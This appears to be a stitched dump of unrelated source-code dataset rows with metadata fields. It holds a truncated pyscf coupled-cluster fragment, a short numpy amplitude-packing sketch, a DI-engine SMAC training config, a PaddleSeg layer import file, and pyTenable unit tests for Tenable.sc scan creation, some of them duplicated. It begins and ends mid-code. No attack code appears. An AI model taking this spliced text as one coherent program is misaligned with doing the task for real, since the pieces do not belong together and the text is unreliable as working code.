Hr2[ki, kj] -= 2. * np.einsum('ijcb,jibc->ijb', t2[ki, kj, k], imds.Woovv[kj, ki, kd])
Hr2[ki, kj] += np.einsum('ijcb,ijbc->ijb', t2[ki, kj, k], imds.Woovv[ki, kj, kd])
return amplitudes_to_vector(cc, Hr1, Hr2, k)
def mask_frozen(cc, vector, k, const=LARGE_DENOM):
r1, r2 = vector_to_amplitudes(cc, vector, k)
nkpts, nocc, nvir = cc.t1.shape
kconserv = cc.khelper.kconserv
nonzero_opadding, nonzero_vpadding = padding_k_idx(cc, kind="split")
new_r1 = const * np.ones_like(r1)
new_r2 = const * np.ones_like(r2)
new_r1[nonzero_opadding[k]] = r1[nonzero_opadding[k]]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
idx = np.ix_([ki], [kj], nonzero_opadding[ki], nonzero_opadding[kj], nonzero_vpadding[kb])
new_r2[idx] = r2[idx]
return amplitudes_to_vector(cc, new_r1, new_r2, k)
| true
| true
|
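The iter_12 / amplitudes_to_vector / vector_to_amplitudes trio above packs the 1h block r1 and the 2h1p block r2 into a single flat Davidson vector and back; the real code additionally masks padded orbital indices per k-point. A numpy-only sketch of the round trip, with toy dimensions standing in for nkpts/nocc/nvir (no pyscf required, padding omitted):

import numpy as np

nkpts, nocc, nvir = 2, 3, 4  # toy dimensions, illustrative only

def to_vector(r1, r2):
    # Concatenate the 1h block and the flattened 2h1p block.
    return np.concatenate([r1.ravel(), r2.ravel()])

def to_amplitudes(vec):
    r1 = vec[:nocc]
    r2 = vec[nocc:].reshape(nkpts, nkpts, nocc, nocc, nvir)
    return r1, r2

r1 = np.random.rand(nocc)
r2 = np.random.rand(nkpts, nkpts, nocc, nocc, nvir)
vec = to_vector(r1, r2)
s1, s2 = to_amplitudes(vec)
assert np.allclose(r1, s1) and np.allclose(r2, s2)
print(vec.size)  # nocc + nkpts**2 * nocc**2 * nvir = 3 + 144 = 147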
1c445cab1f264bc0cde511b0887a73c7ef7e0b55
| 2,571
|
py
|
Python
|
dizoo/smac/config/smac_10m11m_masac_config.py
|
davide97l/DI-engine
|
d48c93bcd5c07c29f2ce4ac1b7756b8bc255c423
|
[
"Apache-2.0"
] | 1
|
2022-03-21T16:15:39.000Z
|
2022-03-21T16:15:39.000Z
|
dizoo/smac/config/smac_10m11m_masac_config.py
|
jiaruonan/DI-engine
|
268d77db3cb54401b2cfc83e2bc3ec87c31e7b83
|
[
"Apache-2.0"
] | null | null | null |
dizoo/smac/config/smac_10m11m_masac_config.py
|
jiaruonan/DI-engine
|
268d77db3cb54401b2cfc83e2bc3ec87c31e7b83
|
[
"Apache-2.0"
] | null | null | null |
from easydict import EasyDict
agent_num = 10
collector_env_num = 8
evaluator_env_num = 8
special_global_state = True
SMAC_10m11m_masac_default_config = dict(
exp_name='smac_10m11m_masac_seed0',
env=dict(
map_name='10m_vs_11m',
difficulty=7,
reward_only_positive=True,
mirror_opponent=False,
agent_num=agent_num,
collector_env_num=collector_env_num,
evaluator_env_num=evaluator_env_num,
n_evaluator_episode=32,
stop_value=0.99,
death_mask=False,
special_global_state=special_global_state,
manager=dict(
shared_memory=False,
reset_timeout=6000,
),
),
policy=dict(
cuda=True,
on_policy=False,
random_collect_size=0,
model=dict(
agent_obs_shape=132,
global_obs_shape=347,
action_shape=17,
twin_critic=True,
actor_head_hidden_size=256,
critic_head_hidden_size=256,
),
learn=dict(
update_per_collect=50,
batch_size=320,
learning_rate_q=5e-4,
learning_rate_policy=5e-4,
learning_rate_alpha=5e-5,
ignore_done=False,
target_theta=0.005,
discount_factor=0.99,
alpha=0.2,
auto_alpha=True,
log_space=True,
),
collect=dict(
env_num=collector_env_num,
n_sample=1600,
unroll_len=1,
),
command=dict(),
eval=dict(
evaluator=dict(
eval_freq=50,
),
env_num=evaluator_env_num,
),
other=dict(
eps=dict(
type='linear',
start=1,
end=0.05,
decay=100000,
),
replay_buffer=dict(replay_buffer_size=50000, ), ),
),
)
SMAC_10m11m_masac_default_config = EasyDict(SMAC_10m11m_masac_default_config)
main_config = SMAC_10m11m_masac_default_config
SMAC_10m11m_masac_default_create_config = dict(
env=dict(
type='smac',
import_names=['dizoo.smac.envs.smac_env'],
),
env_manager=dict(type='base'),
policy=dict(
type='sac_discrete',
),
)
SMAC_10m11m_masac_default_create_config = EasyDict(SMAC_10m11m_masac_default_create_config)
create_config = SMAC_10m11m_masac_default_create_config
if __name__ == '__main__':
from ding.entry import serial_pipeline
serial_pipeline((main_config, create_config), seed=0)
| 27.063158
| 91
| 0.597044
|
from easydict import EasyDict
agent_num = 10
collector_env_num = 8
evaluator_env_num = 8
special_global_state = True
SMAC_10m11m_masac_default_config = dict(
exp_name='smac_10m11m_masac_seed0',
env=dict(
map_name='10m_vs_11m',
difficulty=7,
reward_only_positive=True,
mirror_opponent=False,
agent_num=agent_num,
collector_env_num=collector_env_num,
evaluator_env_num=evaluator_env_num,
n_evaluator_episode=32,
stop_value=0.99,
death_mask=False,
special_global_state=special_global_state,
manager=dict(
shared_memory=False,
reset_timeout=6000,
),
),
policy=dict(
cuda=True,
on_policy=False,
random_collect_size=0,
model=dict(
agent_obs_shape=132,
global_obs_shape=347,
action_shape=17,
twin_critic=True,
actor_head_hidden_size=256,
critic_head_hidden_size=256,
),
learn=dict(
update_per_collect=50,
batch_size=320,
learning_rate_q=5e-4,
learning_rate_policy=5e-4,
learning_rate_alpha=5e-5,
ignore_done=False,
target_theta=0.005,
discount_factor=0.99,
alpha=0.2,
auto_alpha=True,
log_space=True,
),
collect=dict(
env_num=collector_env_num,
n_sample=1600,
unroll_len=1,
),
command=dict(),
eval=dict(
evaluator=dict(
eval_freq=50,
),
env_num=evaluator_env_num,
),
other=dict(
eps=dict(
type='linear',
start=1,
end=0.05,
decay=100000,
),
replay_buffer=dict(replay_buffer_size=50000, ), ),
),
)
SMAC_10m11m_masac_default_config = EasyDict(SMAC_10m11m_masac_default_config)
main_config = SMAC_10m11m_masac_default_config
SMAC_10m11m_masac_default_create_config = dict(
env=dict(
type='smac',
import_names=['dizoo.smac.envs.smac_env'],
),
env_manager=dict(type='base'),
policy=dict(
type='sac_discrete',
),
)
SMAC_10m11m_masac_default_create_config = EasyDict(SMAC_10m11m_masac_default_create_config)
create_config = SMAC_10m11m_masac_default_create_config
if __name__ == '__main__':
from ding.entry import serial_pipeline
serial_pipeline((main_config, create_config), seed=0)
| true
| true
|
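The config above is a plain nested dict wrapped in EasyDict, so downstream code (and quick experiments) can read and override fields with attribute access before handing (main_config, create_config) to serial_pipeline. A small sketch of that override pattern (only easydict is needed for this part; the values below are illustrative):

from easydict import EasyDict

cfg = EasyDict(dict(policy=dict(learn=dict(batch_size=320, learning_rate_q=5e-4))))

# Attribute-style reads and overrides, e.g. for a quick hyperparameter sweep.
cfg.policy.learn.batch_size = 160
cfg.policy.learn.learning_rate_q *= 2
print(cfg.policy.learn.batch_size, cfg.policy.learn.learning_rate_q)  # 160 0.001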
1c445d0779c6f3b76f6736904e9cf3bc52dc1ec8
| 906
|
py
|
Python
|
paddleseg/models/layers/__init__.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 4,708
|
2019-08-26T13:54:39.000Z
|
2022-03-31T16:01:53.000Z
|
paddleseg/models/layers/__init__.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 1,083
|
2019-09-12T02:57:24.000Z
|
2022-03-31T13:30:30.000Z
|
paddleseg/models/layers/__init__.py
|
JamesLim-sy/PaddleSeg
|
f8cfb80f543a52599d1588026e71f069b702b781
|
[
"Apache-2.0"
] | 1,046
|
2019-08-26T22:05:01.000Z
|
2022-03-30T14:09:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .layer_libs import ConvBNReLU, ConvBN, SeparableConvBNReLU, DepthwiseConvBN, AuxLayer, SyncBatchNorm, JPU
from .activation import Activation
from .pyramid_pool import ASPPModule, PPModule
from .attention import AttentionBlock
from .nonlocal2d import NonLocal2D
from .wrap_functions import *
| 43.142857
| 110
| 0.791391
|
from .layer_libs import ConvBNReLU, ConvBN, SeparableConvBNReLU, DepthwiseConvBN, AuxLayer, SyncBatchNorm, JPU
from .activation import Activation
from .pyramid_pool import ASPPModule, PPModule
from .attention import AttentionBlock
from .nonlocal2d import NonLocal2D
from .wrap_functions import *
| true
| true
|
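This __init__ only re-exports PaddleSeg's layer building blocks, so model code imports them from paddleseg.models.layers directly. A hedged usage sketch, assuming paddle and paddleseg are installed (to the best of my reading, ConvBNReLU fuses Conv2D + BatchNorm + ReLU and pads 'same' by default, preserving spatial size):

import paddle
from paddleseg.models.layers import ConvBNReLU

block = ConvBNReLU(in_channels=3, out_channels=16, kernel_size=3)
x = paddle.randn([1, 3, 64, 64])
y = block(x)
print(y.shape)  # expected: [1, 16, 64, 64]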
1c445ea6c0a52c6c28514c9caff9783dfe75ea10
| 18,183
|
py
|
Python
|
tests/sc/test_scans.py
|
allenmichael/pyTenable
|
8372cfdf3ced99de50227f6fbb37d6db2b26291e
|
[
"MIT"
] | null | null | null |
tests/sc/test_scans.py
|
allenmichael/pyTenable
|
8372cfdf3ced99de50227f6fbb37d6db2b26291e
|
[
"MIT"
] | null | null | null |
tests/sc/test_scans.py
|
allenmichael/pyTenable
|
8372cfdf3ced99de50227f6fbb37d6db2b26291e
|
[
"MIT"
] | null | null | null |
import pytest
from tenable.errors import APIError, UnexpectedValueError
from ..checker import check
def test_schedule_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor({'type': 1})
def test_schedule_constructor_type_unexpected_value(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._schedule_constructor({'type': 'nothing here'})
def test_schedule_constructor_start_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': 1, 'repeatRule': ''})
def test_schedule_constructor_rrule_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': '', 'repeatRule': 1})
def test_scans_constructor_name_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(name=1)
def test_scans_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(type=1)
def test_scans_constructor_type_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(type='something')
def test_scans_constructor_description_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(description=1)
def test_scans_constructor_repo_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(repo='nope')
def test_scans_constructor_repo_success(sc):
resp = sc.scans._constructor(repo=1)
assert resp == {'repository': {'id': 1}}
def test_scans_constructor_scan_zone_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(scan_zone='nope')
def test_scans_constructor_scan_zone_success(sc):
resp = sc.scans._constructor(scan_zone=1)
assert resp == {'zone': {'id': 1}}
def test_scans_constructor_email_complete_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_complete='nope')
def test_scans_constructor_email_complete_success(sc):
resp = sc.scans._constructor(email_complete=True)
assert resp == {'emailOnFinish': 'true'}
def test_scans_constructor_email_launch_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_launch='nope')
def test_scans_constructor_email_launch_success(sc):
resp = sc.scans._constructor(email_launch=True)
assert resp == {'emailOnLaunch': 'true'}
def test_scans_constructor_timeout_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(timeout=1)
def test_scans_constructor_timeout_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(timeout='something')
def test_scans_constructor_timeout_success(sc):
resp = sc.scans._constructor(timeout='rollover')
assert resp == {'timeoutAction': 'rollover'}
def test_scans_constructor_host_tracking_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(host_tracking='something')
def test_scans_constructor_host_tracking_success(sc):
assert {'dhcpTracking': 'true'} == sc.scans._constructor(host_tracking=True)
def test_scans_constructor_vhosts_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(vhosts='nope')
def test_scans_constructor_vhosts_success(sc):
resp = sc.scans._constructor(vhosts=True)
assert resp == {'scanningVirtualHosts': 'true'}
def test_scans_constructor_rollover_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(rollover=1)
def test_scans_constructor_rollover_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(rollover='something')
def test_scans_constructor_rollover_success(sc):
assert {'rolloverType': 'nextDay'} == sc.scans._constructor(rollover='nextDay')
def test_scans_constructor_targets_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(targets='something')
def test_scans_constructor_targets_success(sc):
resp = sc.scans._constructor(targets=['127.0.0.1', '127.0.0.2'])
assert resp == {'ipList': '127.0.0.1,127.0.0.2'}
def test_scans_constructor_max_time_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(max_time='nope')
def test_scans_constructor_max_time_success(sc):
resp = sc.scans._constructor(max_time=3600)
assert resp == {'maxScanTime': '3600'}
def test_scans_constructor_max_time_zero(sc):
resp = sc.scans._constructor(max_time=0)
assert resp == {'maxScanTime': 'unlimited'}
def test_scans_constructor_schedule_success(sc):
scan = sc.scans._constructor(schedule={'type': 'ical', 'start': ''})
assert {'schedule': {'type': 'ical', 'start': ''}} == scan
def test_scans_constructor_auto_mitigation_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(auto_mitigation='nope')
def test_scans_constructor_auto_mitigation_success(sc):
resp = sc.scans._constructor(auto_mitigation=True)
assert resp == {'classifyMitigatedAge': 'true'}
def test_scans_constructor_reports_typeerror_base(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports='nope')
def test_scans_constructor_reports_typeerror_id(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 'nope', 'reportSource': 'cumulative'}])
def test_scans_constructor_reports_typeerror_report_source(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 1}])
def test_scans_constructor_reports_unexpectedvalueerror_reportsource(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'something'}])
def test_scans_constructor_reports_success(sc):
resp = sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'cumulative'}])
assert resp == {'reports': [{'id': 1, 'reportSource': 'cumulative'}]}
def test_scans_constructor_asset_lists_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=1)
def test_scans_constructor_asset_list_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=['nope', ])
def test_scans_constructor_asset_lists_success(sc):
resp = sc.scans._constructor(asset_lists=[1, 2])
assert resp == {'assets': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_creds_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=1)
def test_scans_constructor_creds_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=['nope'])
def test_scans_constructor_creds_success(sc):
resp = sc.scans._constructor(creds=[1, 2])
assert resp == {'credentials': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_both_policy_and_plugin_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(plugin_id=1, policy_id=1)
def test_scans_constructor_plugin_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(plugin_id='nope')
def test_scans_constructor_plugin_id_success(sc):
resp = sc.scans._constructor(plugin_id=19506)
assert resp == {'type': 'plugin', 'pluginID': 19506}
def test_scans_constructor_policy_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(policy_id='nope')
def test_scans_constructor_policy_id_success(sc):
resp = sc.scans._constructor(policy_id=1)
assert resp == {'type': 'policy', 'policy': {'id': 1}}
@pytest.fixture
def scan(request, sc, vcr):
with vcr.use_cassette('sc_scans_create'):
scan = sc.scans.create('Example Scan', 1,
schedule_type='template',
targets=['127.0.0.1'],
policy_id=1000001)
def teardown():
try:
sc.scans.delete(int(scan['id']))
except APIError:
pass
request.addfinalizer(teardown)
return scan
@pytest.mark.vcr()
def test_scans_list(sc):
scans = sc.scans.list()
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'status', str)
@pytest.mark.vcr()
def test_scans_list_for_fields(sc):
scans = sc.scans.list(fields=['id', 'name'])
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
@pytest.mark.vcr()
def test_scans_details(sc, scan):
scan = sc.scans.details(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_details_for_fields(sc, scan):
scan_details = sc.scans.details(int(scan['id']), fields=['id', 'name', 'description'])
assert isinstance(scan_details, dict)
check(scan_details, 'id', str)
check(scan_details, 'name', str)
check(scan_details, 'description', str)
@pytest.mark.vcr()
def test_scans_create(scan):
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_create_plugin(sc):
scan = sc.scans.create('Example Scan 9', 9,
schedule_type='template',
targets=['127.0.0.1'],
plugin_id=1000001)
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_edit(sc, scan):
scan = sc.scans.edit(int(scan['id']), name='Edited Example Scan')
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_delete(scan, sc):
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_copy(scan, sc):
scan = sc.scans.copy(int(scan['id']), 'scan_copy', 1)
sc.scans.delete(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_launch(sc, scan):
launch = sc.scans.launch(int(scan['id']), diagnostic_target='target', diagnostic_password='password')
assert isinstance(launch, dict)
check(launch, 'scanID', str)
check(launch, 'scanResult', dict)
check(launch['scanResult'], 'initiatorID', str)
check(launch['scanResult'], 'ownerID', str)
check(launch['scanResult'], 'scanID', str)
check(launch['scanResult'], 'repositoryID', str)
check(launch['scanResult'], 'jobID', str)
check(launch['scanResult'], 'name', str)
check(launch['scanResult'], 'description', str, allow_none=True)
check(launch['scanResult'], 'details', str)
check(launch['scanResult'], 'status', str)
check(launch['scanResult'], 'downloadFormat', str)
check(launch['scanResult'], 'dataFormat', str)
check(launch['scanResult'], 'id', str)
| 32.644524
| 105
| 0.665512
|
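The scan fixture above captures a common pattern in this suite: create the resource inside a VCR cassette, then register a finalizer that tolerates the scan already having been deleted by the test body. A self-contained pytest sketch of that shape (DummyAPI and DummyAPIError are illustrative stand-ins for the TenableSC client and APIError; nothing here talks to a server):

import pytest

class DummyAPIError(Exception):
    pass

class DummyAPI:
    # Stand-in for sc.scans: create() returns a record, delete() raises once gone.
    def __init__(self):
        self._store = {}

    def create(self, name):
        sid = len(self._store) + 1
        self._store[sid] = {'id': str(sid), 'name': name}
        return self._store[sid]

    def delete(self, sid):
        if sid not in self._store:
            raise DummyAPIError('scan not found')
        del self._store[sid]

@pytest.fixture
def scan(request):
    api = DummyAPI()
    record = api.create('Example Scan')

    def teardown():
        try:
            api.delete(int(record['id']))
        except DummyAPIError:
            pass  # already removed by the test body

    request.addfinalizer(teardown)
    return record

def test_scan_has_id(scan):
    assert scan['id'] == '1'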
import pytest
from tenable.errors import APIError, UnexpectedValueError
from ..checker import check
def test_schedule_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor({'type': 1})
def test_schedule_constructor_type_unexpected_value(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._schedule_constructor({'type': 'nothing here'})
def test_schedule_constructor_start_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': 1, 'repeatRule': ''})
def test_schedule_constructor_rrule_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': '', 'repeatRule': 1})
def test_scans_constructor_name_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(name=1)
def test_scans_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(type=1)
def test_scans_constructor_type_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(type='something')
def test_scans_constructor_description_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(description=1)
def test_scans_constructor_repo_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(repo='nope')
def test_scans_constructor_repo_success(sc):
resp = sc.scans._constructor(repo=1)
assert resp == {'repository': {'id': 1}}
def test_scans_constructor_scan_zone_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(scan_zone='nope')
def test_scans_constructor_scan_zone_success(sc):
resp = sc.scans._constructor(scan_zone=1)
assert resp == {'zone': {'id': 1}}
def test_scans_constructor_email_complete_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_complete='nope')
def test_scans_constructor_email_complete_success(sc):
resp = sc.scans._constructor(email_complete=True)
assert resp == {'emailOnFinish': 'true'}
def test_scans_constructor_email_launch_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_launch='nope')
def test_scans_constructor_email_launch_success(sc):
resp = sc.scans._constructor(email_launch=True)
assert resp == {'emailOnLaunch': 'true'}
def test_scans_constructor_timeout_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(timeout=1)
def test_scans_constructor_timeout_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(timeout='something')
def test_scans_constructor_timeout_success(sc):
resp = sc.scans._constructor(timeout='rollover')
assert resp == {'timeoutAction': 'rollover'}
def test_scans_constructor_host_tracking_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(host_tracking='something')
def test_scans_constructor_host_tracking_success(sc):
assert {'dhcpTracking': 'true'} == sc.scans._constructor(host_tracking=True)
def test_scans_constructor_vhosts_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(vhosts='nope')
def test_scans_constructor_vhosts_success(sc):
resp = sc.scans._constructor(vhosts=True)
assert resp == {'scanningVirtualHosts': 'true'}
def test_scans_constructor_rollover_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(rollover=1)
def test_scans_constructor_rollover_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(rollover='something')
def test_scans_constructor_rollover_success(sc):
assert {'rolloverType': 'nextDay'} == sc.scans._constructor(rollover='nextDay')
def test_scans_constructor_targets_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(targets='something')
def test_scans_constructor_targets_success(sc):
resp = sc.scans._constructor(targets=['127.0.0.1', '127.0.0.2'])
assert resp == {'ipList': '127.0.0.1,127.0.0.2'}
def test_scans_constructor_max_time_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(max_time='nope')
def test_scans_constructor_max_time_success(sc):
resp = sc.scans._constructor(max_time=3600)
assert resp == {'maxScanTime': '3600'}
def test_scans_constructor_max_time_zero(sc):
resp = sc.scans._constructor(max_time=0)
